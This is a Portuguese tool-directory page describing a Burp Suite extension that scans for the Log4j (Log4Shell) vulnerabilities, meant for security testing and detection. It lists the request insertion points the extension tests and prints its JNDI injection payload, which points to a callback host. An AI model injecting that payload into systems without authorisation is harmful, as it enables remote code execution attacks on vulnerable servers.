Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Burp-Log4j-HammerTime — Extensão de Active Scan do Burp para identificar as vulnerabilidades Log4j CVE-2021-44228 e CVE-2021-45046 | Kitploit
Ferramentas/GitHubGitHub/dxc-strikeforce/burp-log4j-hammertime
Scanners de VulnerabilidadesAnálise Dinâmica (Sandboxing)ExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubdxc-strikeforce/burp-log4j-hammertime

Burp-Log4j-HammerTime

Extensão de Active Scan do Burp para identificar as vulnerabilidades Log4j CVE-2021-44228 e CVE-2021-45046

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
8há 4 anosAinda não revisado

Log4j-HammerTime

Esta extensão de Scanner Ativo do Burp Suite valida a exploração das vulnerabilidades Apache Log4j CVE-2021-44228 e CVE-2021-45046.

Esta extensão usa o Burp Collaborator para verificar o problema.

Uso

  • Ative esta extensão
  • Inicie uma Varredura Ativa em um alvo específico

se você deseja executar apenas verificações deste módulo, pode importar o perfil extensions-only.json e selecioná-lo como o Perfil de Varredura Ativa.

Detalhes

Durante uma Varredura Ativa, os seguintes pontos de inserção são testados nesta extensão:

  • HEADER
  • PARAM_NAME_BODY
  • PARAM_BODY
  • PARAM_NAME_URL
  • PARAM_URL
  • PARAM_COOKIE
  • PARAM_JSON
  • ENTIRE_BODY

Em cada ponto de inserção, a requisição é injetada com o seguinte payload: ${jndi:ldap://{BURPCOLLABORATOR}/exploit.class}

Além disso, esta extensão adiciona muitos cabeçalhos que estão habilitados em headers (linhas não comentadas). Estes cabeçalhos são injetados um por um em uma requisição separada.

Aviso Legal

Este projeto é feito apenas para fins educacionais e de testes éticos. O uso do Log4Shell-active-scanner para atacar alvos sem consentimento mútuo prévio é ilegal. É responsabilidade do usuário final obedecer todas as leis locais, estaduais e federais aplicáveis. Os desenvolvedores não assumem nenhuma responsabilidade e não são responsáveis por qualquer uso indevido ou dano causado por este programa.

Licença

O projeto é licenciado sob a Licença MIT.

Autores

  • Freskimo
Baixar ferramenta